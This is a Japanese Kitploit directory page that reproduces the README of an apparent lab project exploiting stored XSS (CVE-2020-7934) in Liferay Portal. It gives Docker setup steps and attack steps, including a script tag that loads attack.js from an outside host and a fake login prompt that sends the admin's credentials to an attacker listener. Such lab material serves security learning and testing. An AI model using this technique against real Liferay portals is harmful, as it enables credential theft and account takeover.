Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
audit-xss-cve-2020-7934 — DockerベースのXSSエクスプロイトで、CVE-2020-7934を標的としたLiferayポータル向け。ユーザープロファイルフィールドを介したストアドクロスサイトスクリプティングを示し、管理者認証情報を盗み出します。 | Kitploit
ツール/GitHubGitHub/giardinas-dev/audit-xss-cve-2020-7934
脆弱性分析エクスプロイトウェブアプリケーション悪用CTFペネトレーションテスト学習と教育
GitHubgiardinas-dev/audit-xss-cve-2020-7934

audit-xss-cve-2020-7934

DockerベースのXSSエクスプロイトで、CVE-2020-7934を標的としたLiferayポータル向け。ユーザープロファイルフィールドを介したストアドクロスサイトスクリプティングを示し、管理者認証情報を盗み出します。

リポジトリを見る
454年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE 2020-7934

CVEの実行方法

必要条件

  1. docker

備考

攻撃スクリプトをオンラインに配置することが可能です(JSコードを指定) http://yourjavascript.com/ 攻撃用のオンラインJSスクリプト html <script src="http://yourjavascript.com/920172199111/attack.js"></script>

設定コマンド

  1. このプロジェクトのルートフォルダに移動する
  2. "sudo docker-compose up --build" を実行する
  3. 新しいターミナル: "docker inspect liferay" を実行する ==> そして IPAddress の値をコピーする
  4. 新しいターミナル: "python api_attacker.py" を実行する
  5. ブラウザを開き、"http://IPAddress:8080" にアクセスする ==> liferay ポータルが応答として表示されるはずです
  6. コンテナを停止・削除するには "sudo docker-compose rm" を使用する

攻撃手順

  1. liferay にユーザーとして登録し、ログインし、「利用可能なサイト」セクションで「liferay」サイトに参加する。
  2. JSスクリプト内の「姓」を変更する(直接()または「src = "http ..."」を通じて)
  3. 管理者 liferay としてログインする(ユーザー名: [email protected]、パスワード: test)
  4. 利用可能なサイトに移動し、「liferay」をクリックすると、このサイトの公開ページが開く。
  5. 新しいページに移動すると、右側にメニューが開くので、「メンバーシップ」をクリックする。
  • 手順1で登録したユーザーを選択する。その時点でスクリプトが実行される。 5.1) attack.js スクリプト内で、ページが認証情報を要求する。
  • 手順5(設定コマンドの)のターミナルに、5.1で入力されたユーザー名/パスワード(管理者による)が表示される。
  • ツールをダウンロード